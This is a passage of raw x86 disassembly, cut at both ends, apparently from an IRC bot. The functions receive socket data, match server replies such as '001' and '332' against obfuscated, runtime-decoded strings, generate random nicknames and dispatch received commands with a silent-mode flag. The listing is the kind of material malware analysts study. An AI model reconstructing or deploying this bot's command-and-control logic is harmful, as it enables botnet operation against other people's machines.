jnz short loc_417D25
sub eax, esi
push edi
push 4
lea esi, [ebp+var_40]
mov [eax+ebx], cl
call sub_41964D
mov eax, esi
push eax
push ebx
push offset aSS_0 ; "%s%s|"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 1Ch
lea esi, [eax+1]
loc_417D55: ; CODE XREF: sub_417C7B+DFj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D55
sub eax, esi
mov [eax+ebx], cl
call sub_419B7D
test al, al
jz short loc_417D8C
push ebx
push offset aSp ; "%sP|"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417D80: ; CODE XREF: sub_417C7B+10Aj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417D80
sub eax, esi
mov [eax+ebx], cl
loc_417D8C: ; CODE XREF: sub_417C7B+EDj
call sub_4195CE
mov eax, dword_4280FC
cmp eax, edi
mov ecx, dword_4280F8
jg short loc_417DC8
jl short loc_417DA7
cmp ecx, 0Ah
jnb short loc_417DC8
loc_417DA7: ; CODE XREF: sub_417C7B+125j
push eax
push ecx
push ebx
push offset aS0I64u ; "%s0%I64u|"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_417DBF: ; CODE XREF: sub_417C7B+149j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DBF
jmp short loc_417DE7
; ---------------------------------------------------------------------------
loc_417DC8: ; CODE XREF: sub_417C7B+123j
; sub_417C7B+12Aj
push eax
push ecx
push ebx
push offset aSI64u ; "%s%I64u|"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 18h
lea esi, [eax+1]
loc_417DE0: ; CODE XREF: sub_417C7B+16Aj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417DE0
loc_417DE7: ; CODE XREF: sub_417C7B+14Bj
sub eax, esi
mov byte ptr [eax+ebx], 0
xor esi, esi
cmp dword_426C04, edi
jle short loc_417E34
loc_417DF7: ; CODE XREF: sub_417C7B+1B7j
call sub_40372F
push 31h
pop ecx
xor edx, edx
div ecx
movsx eax, [ebp+edx+var_3C]
push eax
push ebx
push offset aSC ; "%s%c"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 14h
lea edi, [eax+1]
loc_417E1F: ; CODE XREF: sub_417C7B+1A9j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E1F
sub eax, edi
inc esi
mov [eax+ebx], cl
cmp esi, dword_426C04
jl short loc_417DF7
loc_417E34: ; CODE XREF: sub_417C7B+17Aj
push ebx
push offset aS ; "%s]"
push 22h
push ebx
call sub_402EBA
mov eax, ebx
add esp, 10h
lea esi, [eax+1]
loc_417E4A: ; CODE XREF: sub_417C7B+1D4j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_417E4A
sub eax, esi
mov [eax+ebx], cl
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
mov eax, ebx
pop esi
call sub_402ADC
leave
retn
sub_417C7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E66 proc near ; CODE XREF: sub_41802D+6A7p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 824h
push ebx
push esi
push edi
push offset asc_4203A8 ; " "
push [ebp+arg_14]
xor ebx, ebx
mov byte ptr [ebp+var_8], 0
mov [ebp+var_4], ebx
call sub_403DF4
jmp short loc_417EC8
; ---------------------------------------------------------------------------
loc_417E8A: ; CODE XREF: sub_417E66+68j
mov eax, [ebp+var_4]
push offset aS_8 ; "-s"
push esi
mov [ebp+eax*4+var_820], esi
call sub_402C75
test eax, eax
pop ecx
pop ecx
jz short loc_417EB6
push offset aS_9 ; "/s"
push esi
call sub_402C75
test eax, eax
pop ecx
pop ecx
jnz short loc_417EBA
loc_417EB6: ; CODE XREF: sub_417E66+3Dj
mov byte ptr [ebp+var_8], 1
loc_417EBA: ; CODE XREF: sub_417E66+4Ej
push offset asc_4203B4 ; " "
push ebx
call sub_403DF4
inc [ebp+var_4]
loc_417EC8: ; CODE XREF: sub_417E66+22j
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jnz short loc_417E8A
mov edi, [ebp+arg_0]
mov esi, [ebp+var_820]
add edi, 5
mov edx, edi
mov ecx, esi
loc_417EE0: ; CODE XREF: sub_417E66+92j
mov al, [ecx]
cmp al, [edx]
jnz short loc_417EFE
test al, al
jz short loc_417EFA
mov al, [ecx+1]
cmp al, [edx+1]
jnz short loc_417EFE
inc ecx
inc ecx
inc edx
inc edx
test al, al
jnz short loc_417EE0
loc_417EFA: ; CODE XREF: sub_417E66+82j
xor eax, eax
jmp short loc_417F03
; ---------------------------------------------------------------------------
loc_417EFE: ; CODE XREF: sub_417E66+7Ej
; sub_417E66+8Aj
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417F03: ; CODE XREF: sub_417E66+96j
cmp eax, ebx
jz short loc_417F14
mov eax, edi
mov ecx, esi
call sub_41987A
test eax, eax
jz short loc_417F40
loc_417F14: ; CODE XREF: sub_417E66+9Fj
xor eax, eax
cmp [ebp+var_4], ebx
jle short loc_417F3D
mov ecx, [ebp+var_4]
dec ecx
loc_417F1F: ; CODE XREF: sub_417E66+CFj
cmp eax, ecx
jz short loc_417F31
mov edx, [ebp+eax*4+var_81C]
mov [ebp+eax*4+var_820], edx
loc_417F31: ; CODE XREF: sub_417E66+BBj
inc eax
cmp eax, [ebp+var_4]
jl short loc_417F1F
mov esi, [ebp+var_820]
loc_417F3D: ; CODE XREF: sub_417E66+B3j
dec [ebp+var_4]
loc_417F40: ; CODE XREF: sub_417E66+ACj
cmp byte ptr [ebp+var_8], bl
jz short loc_417F48
dec [ebp+var_4]
loc_417F48: ; CODE XREF: sub_417E66+DDj
mov al, [esi]
cmp al, byte_4269D0
jnz loc_418026
mov eax, esi
lea ecx, [eax+1]
loc_417F5B: ; CODE XREF: sub_417E66+FAj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_417F5B
sub eax, ecx
push eax
lea eax, [esi+1]
push eax
push esi
call sub_403CD0
mov eax, dword_4357B0
mov esi, [eax]
mov ebx, offset dword_4357AC
mov edi, ebx
add esp, 0Ch
mov [ebp+var_C], esi
mov [ebp+var_10], edi
loc_417F86: ; CODE XREF: sub_417E66+192j
test edi, edi
mov eax, dword_4357B0
mov [ebp+var_14], eax
jz short loc_417F96
cmp edi, ebx
jz short loc_417F9B
loc_417F96: ; CODE XREF: sub_417E66+12Aj
call sub_403329
loc_417F9B: ; CODE XREF: sub_417E66+12Ej
cmp esi, [ebp+var_14]
jz loc_418026
test edi, edi
jnz short loc_417FAD
call sub_403329
loc_417FAD: ; CODE XREF: sub_417E66+140j
cmp esi, [edi+4]
jnz short loc_417FB7
call sub_403329
loc_417FB7: ; CODE XREF: sub_417E66+14Aj
mov ecx, [ebp+var_820]
lea eax, [esi+0Ch]
loc_417FC0: ; CODE XREF: sub_417E66+172j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_417FDE
test dl, dl
jz short loc_417FDA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_417FDE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_417FC0
loc_417FDA: ; CODE XREF: sub_417E66+162j
xor eax, eax
jmp short loc_417FE3
; ---------------------------------------------------------------------------
loc_417FDE: ; CODE XREF: sub_417E66+15Ej
; sub_417E66+16Aj
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_417FE3: ; CODE XREF: sub_417E66+176j
test eax, eax
jz short loc_417FFA
lea edi, [ebp+var_20]
lea esi, [ebp+var_10]
call sub_40168C
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jmp short loc_417F86
; ---------------------------------------------------------------------------
loc_417FFA: ; CODE XREF: sub_417E66+17Fj
cmp esi, [edi+4]
jnz short loc_418004
call sub_403329
loc_418004: ; CODE XREF: sub_417E66+197j
mov ecx, [esi+8]
mov eax, [ecx]
lea edx, [ebp+var_820]
push edx
mov edx, [ebp+var_4]
dec edx
push edx
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_4]
call dword ptr [eax]
loc_418026: ; CODE XREF: sub_417E66+EAj
; sub_417E66+138j
pop edi
pop esi
pop ebx
leave
retn 18h
sub_417E66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41802D proc near ; CODE XREF: sub_4186F1+107p
var_10F34 = dword ptr -10F34h
var_10734 = dword ptr -10734h
var_10730 = dword ptr -10730h
var_1072C = byte ptr -1072Ch
var_1062C = byte ptr -1062Ch
var_1052C = byte ptr -1052Ch
var_1042C = byte ptr -1042Ch
var_72C = byte ptr -72Ch
var_72B = byte ptr -72Bh
var_62C = byte ptr -62Ch
var_62B = byte ptr -62Bh
var_52C = byte ptr -52Ch
var_52B = byte ptr -52Bh
var_52A = byte ptr -52Ah
var_32C = byte ptr -32Ch
var_32B = byte ptr -32Bh
var_22C = byte ptr -22Ch
var_22B = byte ptr -22Bh
var_1AC = byte ptr -1ACh
var_1AB = byte ptr -1ABh
var_A8 = byte ptr -0A8h
var_A7 = byte ptr -0A7h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10F38h
call sub_4117B0
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [ebp+var_10734], eax
lea eax, [ebp+var_52B]
mov edi, ecx
push ebx
push eax
mov [ebp+var_10730], edi
mov [ebp+var_52C], bl
call sub_407F20
add esp, 0Ch
push edi
push offset aS_12 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402EBA
lea eax, [ebp+var_52C]
add esp, 10h
lea edi, [eax+1]
loc_418095: ; CODE XREF: sub_41802D+6Dj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418095
sub eax, edi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
push offset asc_420334 ; " :"
push eax
call sub_403B70
push eax
push offset aS_13 ; "%s"
lea eax, [ebp+var_52C]
push esi
push eax
call sub_402EBA
lea eax, [ebp+var_52C]
add esp, 18h
lea esi, [eax+1]
loc_4180D5: ; CODE XREF: sub_41802D+ADj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4180D5
sub eax, esi
mov [ebp+eax+var_52C], bl
lea eax, [ebp+var_52C]
lea esi, [eax+1]
loc_4180EE: ; CODE XREF: sub_41802D+C6j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4180EE
sub eax, esi
push eax
lea eax, [ebp+var_52A]
push eax
lea eax, [ebp+var_52C]
push eax
call sub_403CD0
add esp, 0Ch
push offset asc_42033C ; " "
push [ebp+var_10730]
call sub_403DF4
cmp eax, ebx
pop ecx
pop ecx
jz short loc_41816F
xor esi, esi
loc_418126: ; CODE XREF: sub_41802D+140j
push eax
push offset aS_14 ; "%s"
lea edi, [ebp+esi+var_1072C]
push 0FFh
push edi
call sub_402EBA
mov eax, edi
add esp, 10h
lea edi, [eax+1]
loc_418146: ; CODE XREF: sub_41802D+11Ej
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418146
sub eax, edi
add eax, esi
push offset asc_420344 ; " "
push ebx
mov [ebp+eax+var_1072C], bl
call sub_403DF4
pop ecx
add esi, 100h
cmp eax, ebx
pop ecx
jnz short loc_418126
loc_41816F: ; CODE XREF: sub_41802D+F5j
xor eax, eax
mov [ebp+var_2C], bl
lea edi, [ebp+var_2B]
stosd
stosd
xor eax, eax
mov [ebp+var_38], bl
lea edi, [ebp+var_37]
stosd
stosd
xor eax, eax
mov [ebp+var_54], bl
lea edi, [ebp+var_53]
stosd
stosd
stosd
xor eax, eax
mov [ebp+var_20], bl
lea edi, [ebp+var_1F]
stosd
push 0FFh
stosd
lea eax, [ebp+var_32B]
push ebx
push eax
mov [ebp+var_32C], bl
call sub_407F20
add esp, 0Ch
push 2Fh
lea eax, [ebp+var_A7]
push ebx
push eax
mov [ebp+var_A8], bl
call sub_407F20
xor eax, eax
mov [ebp+var_14], bl
lea edi, [ebp+var_13]
stosd
stosd
xor eax, eax
mov [ebp+var_44], bl
lea edi, [ebp+var_43]
stosd
add esp, 0Ch
push 7Fh
stosd
lea eax, [ebp+var_22B]
push ebx
push eax
mov [ebp+var_22C], bl
call sub_407F20
add esp, 0Ch
push 9
lea esi, [ebp+var_2C]
mov ebx, offset aSipj ; "‘ˆ†"
call sub_419F0A
pop ecx
push 9
lea esi, [ebp+var_38]
mov ebx, offset aKivk ; "Šˆ‚Š"
call sub_419F0A
pop ecx
push 0Dh
lea esi, [ebp+var_54]
mov ebx, offset aSuicmtj ; "‘“ˆ—Œ’†"
call sub_419F0A
pop ecx
lea ecx, [ebp+var_2C]
lea eax, [ebp+var_1072C]
loc_418230: ; CODE XREF: sub_41802D+21Bj
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_41824E
test dl, dl
jz short loc_41824A
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_41824E
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_418230
loc_41824A: ; CODE XREF: sub_41802D+20Bj
xor eax, eax
jmp short loc_418253
; ---------------------------------------------------------------------------
loc_41824E: ; CODE XREF: sub_41802D+207j
; sub_41802D+213j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_418253: ; CODE XREF: sub_41802D+21Fj
test eax, eax
jnz short loc_418297
push 9
lea esi, [ebp+var_20]
mov ebx, offset aSopj ; "‘ކ"
call sub_419F0A
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_1062C]
push eax
mov eax, esi
push eax
push offset aSS_10 ; "%s %s\r\n"
call sub_417ABC
add esp, 0Ch
test al, al
jnz short loc_41828F
loc_418288: ; CODE XREF: sub_41802D+333j
xor al, al
jmp loc_4186E0
; ---------------------------------------------------------------------------
loc_41828F: ; CODE XREF: sub_41802D+259j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosb
loc_418297: ; CODE XREF: sub_41802D+228j
lea ecx, [ebp+var_38]
lea eax, [ebp+var_1062C]
loc_4182A0: ; CODE XREF: sub_41802D+28Bj
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_4182BE
test dl, dl
jz short loc_4182BA
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_4182BE
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4182A0
loc_4182BA: ; CODE XREF: sub_41802D+27Bj
xor eax, eax
jmp short loc_4182C3
; ---------------------------------------------------------------------------
loc_4182BE: ; CODE XREF: sub_41802D+277j
; sub_41802D+283j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4182C3: ; CODE XREF: sub_41802D+28Fj
test eax, eax
jnz loc_418365
push 100h
lea esi, [ebp+var_32C]
mov ebx, offset aTtzf ; "â⇔"
call sub_419F0A
pop ecx
mov ecx, esi
lea eax, [ebp+var_1052C]
loc_4182E9: ; CODE XREF: sub_41802D+2D4j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_418307
test dl, dl
jz short loc_418303
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_418307
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_4182E9
loc_418303: ; CODE XREF: sub_41802D+2C4j
xor eax, eax
jmp short loc_41830C
; ---------------------------------------------------------------------------
loc_418307: ; CODE XREF: sub_41802D+2C0j
; sub_41802D+2CCj
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41830C: ; CODE XREF: sub_41802D+2D8j
test eax, eax
jnz loc_4186DE
push 9
lea esi, [ebp+var_14]
mov ebx, offset aLoip ; "‹Žˆ"
call sub_419F0A
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset aFtfss ; "”’”™™"
call sub_419F0A
mov edi, [ebp+var_10734]
pop ecx
mov eax, esi
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
push offset aSSS_2 ; "%s %s %s\r\n"
call sub_417ABC
add esp, 10h
loc_418358: ; CODE XREF: sub_41802D+3E0j
test al, al
jnz loc_4186DE
jmp loc_418288
; ---------------------------------------------------------------------------
loc_418365: ; CODE XREF: sub_41802D+298j
push 4
mov edi, offset a001 ; "001"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_418412
push 9
lea esi, [ebp+var_14]
mov ebx, offset aLoip ; "‹Žˆ"
call sub_419F0A
pop ecx
push 9
lea esi, [ebp+var_44]
mov ebx, offset aMoed ; "ŒŽ…„"
call sub_419F0A
lea esi, [ebp+var_32C]
mov ebx, offset aTtzf ; "â⇔"
mov [esp+10h+var_10], 100h
call sub_419F0A
pop ecx
push 30h
lea esi, [ebp+var_A8]
mov ebx, offset aFtfss ; "”’”™™"
call sub_419F0A
pop ecx
push 80h
lea esi, [ebp+var_22C]
mov ebx, offset byte_4269D1
call sub_419F0A
mov edi, [ebp+var_10734]
pop ecx
lea eax, [ebp+var_A8]
push eax
lea eax, [ebp+var_32C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, esi
push eax
lea eax, [edi+5]
push eax
lea eax, [ebp+var_44]
push eax
push offset aSSSSSS ; "%s %s %s\r\n%s %s %s\r\n"
call sub_417ABC
add esp, 1Ch
jmp loc_418358
; ---------------------------------------------------------------------------
loc_418412: ; CODE XREF: sub_41802D+34Aj
lea ecx, [ebp+var_54]
lea eax, [ebp+var_1062C]
loc_41841B: ; CODE XREF: sub_41802D+406j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_418439
test dl, dl
jz short loc_418435
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_418439
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_41841B
loc_418435: ; CODE XREF: sub_41802D+3F6j
xor eax, eax
jmp short loc_41843E
; ---------------------------------------------------------------------------
loc_418439: ; CODE XREF: sub_41802D+3F2j
; sub_41802D+3FEj
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_41843E: ; CODE XREF: sub_41802D+40Aj
test eax, eax
jz short loc_41845A
push 4
mov edi, offset a332 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz loc_4186DE
loc_41845A: ; CODE XREF: sub_41802D+413j
push 8
pop ecx
xor eax, eax
mov [ebp+var_78], 0
lea edi, [ebp+var_77]
rep stosd
mov ebx, 0FFh
push ebx
stosw
xor esi, esi
lea eax, [ebp+var_1AB]
push esi
push eax
mov byte ptr [ebp+var_10730], 0
mov [ebp+var_1AC], 0
call sub_407F20
add esp, 0Ch
push ebx
lea eax, [ebp+var_62B]
push esi
push eax
mov [ebp+var_62C], 0
call sub_407F20
add esp, 0Ch
push ebx
lea eax, [ebp+var_72B]
push esi
push eax
mov [ebp+var_72C], 0
call sub_407F20
add esp, 0Ch
lea eax, [ebp+var_1072C]
push offset asc_42037C ; " :"
push eax
call sub_403DF4
push eax
push offset aS_0 ; "%s"
lea eax, [ebp+var_62C]
push ebx
push eax
call sub_402EBA
lea eax, [ebp+var_62C]
add esp, 18h
lea esi, [eax+1]
loc_4184F0: ; CODE XREF: sub_41802D+4C8j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4184F0
sub eax, esi
mov [ebp+eax+var_62C], cl
lea eax, [ebp+var_1072C]
push offset asc_420384 ; "!"
push eax
call sub_403DF4
push eax
push offset aS_1 ; "%s"
lea eax, [ebp+var_78]
push 22h
push eax
call sub_402EBA
lea eax, [ebp+var_78]
add esp, 18h
lea esi, [eax+1]
loc_41852B: ; CODE XREF: sub_41802D+503j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41852B
sub eax, esi
mov [ebp+eax+var_78], cl
lea eax, [ebp+var_78]
lea esi, [eax+1]
loc_41853E: ; CODE XREF: sub_41802D+516j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41853E
sub eax, esi
push eax
lea eax, [ebp+var_77]
push eax
lea eax, [ebp+var_78]
push eax
call sub_403CD0
add esp, 0Ch
push 4
mov edi, offset a332_0 ; "332"
lea esi, [ebp+var_1062C]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_4185A4
lea eax, [ebp+var_1042C]
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402EBA
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_418591: ; CODE XREF: sub_41802D+569j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418591
mov byte ptr [ebp+var_10730], 1
jmp loc_418631
; ---------------------------------------------------------------------------
loc_4185A4: ; CODE XREF: sub_41802D+53Dj
mov esi, [ebp+var_10734]
add esi, 5
lea eax, [ebp+var_1052C]
loc_4185B3: ; CODE XREF: sub_41802D+59Ej
mov cl, [eax]
cmp cl, [esi]
jnz short loc_4185D1
test cl, cl
jz short loc_4185CD
mov cl, [eax+1]
cmp cl, [esi+1]
jnz short loc_4185D1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_4185B3
loc_4185CD: ; CODE XREF: sub_41802D+58Ej
xor eax, eax
jmp short loc_4185D6
; ---------------------------------------------------------------------------
loc_4185D1: ; CODE XREF: sub_41802D+58Aj
; sub_41802D+596j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4185D6: ; CODE XREF: sub_41802D+5A2j
test eax, eax
jnz short loc_418605
lea eax, [ebp+var_78]
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402EBA
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_4185FC: ; CODE XREF: sub_41802D+5D4j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4185FC
jmp short loc_418631
; ---------------------------------------------------------------------------
loc_418605: ; CODE XREF: sub_41802D+5ABj
lea eax, [ebp+var_1052C]
push eax
push offset aS_4 ; "%s"
lea eax, [ebp+var_1AC]
push ebx
push eax
call sub_402EBA
lea eax, [ebp+var_1AC]
add esp, 10h
lea edx, [eax+1]
loc_41862A: ; CODE XREF: sub_41802D+602j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41862A
loc_418631: ; CODE XREF: sub_41802D+572j
; sub_41802D+5D6j
sub eax, edx
push 100h
lea esi, [ebp+var_72C]
mov ebx, offset aIbDImdqmin ; "벤¹¸µ¨¬¤ï¬¨"
mov [ebp+eax+var_1AC], 0
call sub_419F0A
pop ecx
lea eax, [ebp+var_62C]
mov ecx, esi
call sub_41987A
test eax, eax
jnz short loc_41866A
cmp byte ptr [ebp+var_10730], al
jz short loc_4186DE
loc_41866A: ; CODE XREF: sub_41802D+633j
xor edi, edi
cmp byte ptr [ebp+var_10730], 0
lea eax, [ebp+var_52C]
jz short loc_418682
push offset asc_42039C ; ";"
jmp short loc_418687
; ---------------------------------------------------------------------------
loc_418682: ; CODE XREF: sub_41802D+64Cj
push offset asc_4203A0 ; ";"
loc_418687: ; CODE XREF: sub_41802D+653j
push eax
call sub_403DF4
jmp short loc_4186A3
; ---------------------------------------------------------------------------
loc_41868F: ; CODE XREF: sub_41802D+67Aj
push offset asc_4203A4 ; ";"
push 0
mov [ebp+edi*4+var_10F34], eax
call sub_403DF4
inc edi
loc_4186A3: ; CODE XREF: sub_41802D+660j
test eax, eax
pop ecx
pop ecx
jnz short loc_41868F
xor esi, esi
test edi, edi
jle short loc_4186DE
loc_4186AF: ; CODE XREF: sub_41802D+6AFj
push [ebp+esi*4+var_10F34]
lea eax, [ebp+var_1AC]
push eax
lea eax, [ebp+var_62C]
push eax
lea eax, [ebp+var_78]
push eax
push [ebp+var_10730]
push [ebp+var_10734]
call sub_417E66
inc esi
cmp esi, edi
jl short loc_4186AF
loc_4186DE: ; CODE XREF: sub_41802D+2E1j
; sub_41802D+32Dj ...
mov al, 1
loc_4186E0: ; CODE XREF: sub_41802D+25Dj
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn 4
sub_41802D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4186F1 proc near ; CODE XREF: sub_41C2E2+456p
var_20414 = dword ptr -20414h
var_20410 = dword ptr -20410h
var_2040C = dword ptr -2040Ch
var_20408 = byte ptr -20408h
var_408 = byte ptr -408h
var_407 = byte ptr -407h
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 20414h
call sub_4117B0
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
mov esi, 3FFh
xor ebx, ebx
push esi
lea eax, [ebp+var_407]
mov edi, ecx
push ebx
push eax
mov [ebp+var_20414], edi
mov [ebp+var_408], bl
call sub_407F20
add esp, 0Ch
push ebx
push esi
lea eax, [ebp+var_408]
push eax
push dword ptr [edi]
mov [ebp+var_2040C], ebx
call ds:dword_41D26C ; recv
test eax, eax
jz loc_418806
lea eax, [ebp+var_408]
lea edx, [eax+1]
loc_418759: ; CODE XREF: sub_4186F1+6Dj
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418759
sub eax, edx
mov [ebp+eax+var_408], bl
lea eax, [ebp+var_408]
push offset asc_420318 ; "\r\n"
push eax
call sub_403DF4
push 20000h
mov edi, eax
lea eax, [ebp+var_20408]
push ebx
push eax
call sub_407F20
add esp, 14h
cmp edi, ebx
mov esi, 200h
jz short loc_4187DC
lea eax, [ebp+var_20408]
mov [ebp+var_20410], eax
loc_4187A6: ; CODE XREF: sub_4186F1+E9j
push edi
push offset aS_10 ; "%s"
push 1FFh
push [ebp+var_20410]
call sub_402EBA
push offset asc_420320 ; "\r\n"
push ebx
call sub_403DF4
add [ebp+var_20410], esi
add esp, 18h
inc [ebp+var_2040C]
mov edi, eax
cmp edi, ebx
jnz short loc_4187A6
loc_4187DC: ; CODE XREF: sub_4186F1+A7j
cmp [ebp+var_2040C], ebx
jle short loc_418802
mov ebx, [ebp+var_2040C]
lea edi, [ebp+var_20408]
loc_4187F0: ; CODE XREF: sub_4186F1+10Fj
push [ebp+var_20414]
mov ecx, edi
call sub_41802D
add edi, esi
dec ebx
jnz short loc_4187F0
loc_418802: ; CODE XREF: sub_4186F1+F1j
mov al, 1
jmp short loc_418810
; ---------------------------------------------------------------------------
loc_418806: ; CODE XREF: sub_4186F1+59j
push dword ptr [edi]
call ds:dword_41D280 ; closesocket
xor al, al
loc_418810: ; CODE XREF: sub_4186F1+113j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_4186F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41881F proc near ; CODE XREF: sub_418B2F+3Ep
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_10], eax
xor eax, eax
mov [ebp+var_C], 0
lea edi, [ebp+var_B]
push 5
lea esi, [ebp+var_C]
mov ebx, offset aPivk ; "ˆ‚Š"
stosd
call sub_419F0A
mov ebx, [ebp+var_10]
pop ecx
add ebx, 5
call sub_417C7B
push ebx
mov eax, esi
push eax
push offset aSS_7 ; "%s %s\r\n"
mov edi, offset dword_42851C
call sub_417ABC
mov ecx, [ebp+var_4]
add esp, 0Ch
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn 4
sub_41881F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418884 proc near ; CODE XREF: sub_41C2E2+444p
var_450 = dword ptr -450h
var_44C = dword ptr -44Ch
var_448 = byte ptr -448h
var_447 = byte ptr -447h
var_444 = byte ptr -444h
var_443 = byte ptr -443h
var_440 = word ptr -440h
var_43E = word ptr -43Eh
var_43C = byte ptr -43Ch
var_430 = byte ptr -430h
var_42F = byte ptr -42Fh
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 454h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 0
push 1
mov edi, ecx
push 2
mov [ebp+var_450], edi
mov ebx, edx
mov [ebp+var_44C], eax
call ds:dword_41D220 ; socket
cmp eax, 0FFFFFFFFh
mov [edi], eax
jnz short loc_4188CE
push eax
